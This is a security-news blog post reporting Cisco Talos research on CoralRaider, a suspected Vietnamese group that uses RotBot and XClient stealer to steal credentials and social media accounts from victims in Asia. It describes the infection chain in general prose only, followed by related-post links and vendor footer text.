RotBot Malware Used on Asian Victims

A suspected threat actor of Vietnamese origin has been observed targeting individuals in various Asian and Southeast Asian nations with malicious software aimed at extracting valuable data since at least May 2023. Identified by Cisco Talos as CoralRaider, this group appears to be driven by financial motives. Their campaign spans across India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.

Security researchers Chetan Raghuprasad and Joey Chen have noted that CoralRaider concentrates on pilfering victims' credentials, financial records, and social media profiles, including business and advertising accounts. They deploy customized variants of Quasar RAT named RotBot and XClient stealer as their primary tools.

In addition to these, the group employs various off-the-shelf malware such as AsyncRAT, NetSupport RAT, and Rhadamanthys for remote access and data theft. Particularly in Vietnam, they have shown interest in seizing control of business and advertising accounts using malware families like Ducktail, NodeStealer, and VietCredCare.

Telegam Used to Funnel Stolen Data

The stolen information is transferred through Telegram and sold in underground markets for profit. CoralRaider's operators are believed to be based in Vietnam, evident from their communication on Telegram channels and the use of Vietnamese language elements in their tools.

Their attack typically begins with a Windows shortcut file (LNK), although the method of distribution remains unclear. Upon opening the LNK file, an HTML application (HTA) is downloaded from a server controlled by the attacker, triggering an embedded Visual Basic script. This script decrypts and executes three PowerShell scripts consecutively, responsible for various evasion tactics and the deployment of RotBot.

RotBot, once activated, connects with a Telegram bot to retrieve and execute XClient stealer in memory. This malware specializes in harvesting cookies, credentials, and financial data from popular web browsers such as Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera, along with data from Discord and Telegram.

Moreover, XClient is designed to extract information from victims' social media accounts like Facebook, Instagram, TikTok, and YouTube, including details related to payment methods and permissions associated with Facebook business and advertising accounts.

By Zaib
April 5, 2024
Computer Security
English
April 5, 2024
Computer Security

Popular Posts

As Fears of the Coronavirus Pandemic Spread, So Does...

4 years ago

Softcnapp Potentially Unwanted Application

2 months ago

What is Cdmx Ransomware?

3 months ago

Error: Ox800VDS Pop-up Scam

11 days ago

Venanco.com Scam

15 days ago

"Your iCloud is Being Hacked" and "Your iPhone has Been...

8 months ago

Related Posts

Android Malware

FluHorse Mobile Malware Tagets Asian Victims

A novel email phishing campaign has targeted different industries in East Asian markets by disseminating a previously unknown type of Android malware named FluHorse that exploits the Flutter software development... Read more

May 9, 2023
Android Malware

FakeReward Mobile Malware Used Against Indian Victims

FakeReward is the name of a mobile malware package that was discovered by security researchers in late November 2022. The malware targets the Android platform and functions very similarly to a banking trojan.... Read more

November 28, 2022
Malware

ValleyFall Malware Spies on Victims

ValleyFall is a type of spyware, which is malicious software created to secretly gather information from a victim's computer or device without their knowledge. Additionally, ValleyFall has the ability to infect... Read more

September 20, 2023
English
Loading...

Cyclonis Backup Details & Terms

The Free Basic Cyclonis Backup plan gives you 2 GB of cloud storage space with full functionality! No credit card required. Need more storage space? Purchase a larger Cyclonis Backup plan today! To learn more about our policies and pricing, see Terms of Service, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Cyclonis Password Manager Details & Terms

FREE Trial: 30-Day One-Time Offer! No credit card required for Free Trial. Full functionality for the length of the Free Trial. (Full functionality after Free Trial requires subscription purchase.) To learn more about our policies and pricing, see EULA, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Home

Products

Cyclonis Backup Cyclonis Password Manager Cyclonis World Time

Support

Help Files FAQs Downloads Inquiries & Support

Company

About Us Contact Us Report Abuse

Legal (Post Merger)

EnigmaSoft Limited (fka Cyclonis Limited)

Cyclonis Backup's Terms of Service Cyclonis Password Manager's EULA Cyclonis World Time's Terms of Service Privacy Policy Cookie Policy Special Discount Offer Terms Additional Terms & Conditions SpyHunter EULA RegHunter EULA EnigmaSoft Privacy Policy & Cookie Policy ESG Privacy Policy & Cookie Policy EnigmaSoft Discount Offer Terms ESG Discount Offer Terms

© 2017-2024 Cyclonis Ltd. CYCLONIS is a trademark of EnigmaSoft Limited (Cyclonis was merged into EnigmaSoft Limited effective November 25, 2023.) All rights reserved.

Registered Office EnigmaSoft Limited: 1 Castle Street, 3rd Floor, Dublin 2 D02 XD82, Ireland.
EnigmaSoft Limited, Private Company Limited by shares, Company Registration Number 597114.

Windows is a trademark of Microsoft, registered in the U.S. and other countries.
Mac, iPhone, iPad and App Store are trademarks of Apple Inc., registered in the U.S. and other countries.
iOS is a registered trademark of Cisco Systems, Inc. and/or its affiliates in the United States and certain other countries.
Android and Google Play are trademarks of Google LLC.